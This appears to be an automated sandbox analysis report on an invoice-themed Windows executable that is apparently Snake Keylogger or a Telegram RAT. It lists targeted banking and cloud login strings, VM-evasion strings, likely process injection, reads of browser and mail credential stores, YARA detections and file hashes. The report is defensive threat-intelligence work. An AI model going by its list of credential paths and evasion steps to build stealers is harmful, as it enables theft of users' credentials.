Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Enables debug privileges

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040604F

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

ID:	1537095
Product:	CloudBasic
Start time:	15:03:04
Start date:	18.10.2024
Sample:	Wuerth_factura_4052073226..exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	787041cd8d6cd5e63534d1b060889a76
SHA1:	82da83771130fbe29d2443635757c3cf5c3949c6
SHA256:	4447fbf1066bc4f640abff84fcac04d0c86664f9823410348a36c280ac80e26d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	FC3772787EB239EF4D0399680DCC4343	DB2FA99EC967178CD8057A14A428A8439A961A73	9B93C61C9D63EF8EC80892CC0E4A0877966DCA9B0C3EB85555CEBD2DDF4D6EED
C:\Users\user\Sympodia\broletto\Imminute.dro	data	7B16E53394F4F4FFD0E7C35379A2293E	29FE76B48F47EE6530307BE96E90948ADF7CF76E	792F317BC4AF8FB6D76C7BC475FD8E1929F9D8B165593773581BE266A51944DB
C:\Users\user\Sympodia\broletto\Kbenhavnerbegivenhed\theravada.txt	ASCII text, with CRLF line terminators	D66DB73C5F70ECF9E205628181597125	113334F1957B7257E1E13F193CF6B8CBBD86528E	A67ABB08865A81C6DF7F7F8368C51C3E67D1C2BC5C9DE1BC547681E3BAA4B417
C:\Users\user\Sympodia\broletto\Orfgild.Sub	data	9D64D16EE047BFAC69F3B2FACE04A73B	273A1C62B1A1C0AC3E91F28D7BE0D1C43378B132	BC409E1EDE84E5868C06A2B73E3ECE79FBF72E61E004CD84A598D20D0A6DE432
C:\Users\user\Sympodia\broletto\antagonister.kid	data	58126CECCD4050BCE5859F67637DE1EE	A130A906A246F985EA0BE292121D15C4648CDCFD	670B812EAAE8E8B967956CE5ADE35427586B14360387B38431CDCC34127AF394
C:\Users\user\Sympodia\broletto\magtpolitiske.ret	data	CD2DF99412676A25675042D7DCB85703	D46F497C4784B4F7CB53221943ADE9EBA9517191	E20FFB018B127D728280C6CA25C03A6899283A1FE0851756BB5F41B65C63753F

Windows Analysis Report
Wuerth_factura_4052073226..exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Wuerth_factura_4052073226..exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Wuerth_factura_4052073226..exe

Malware Threat Intel
Provided by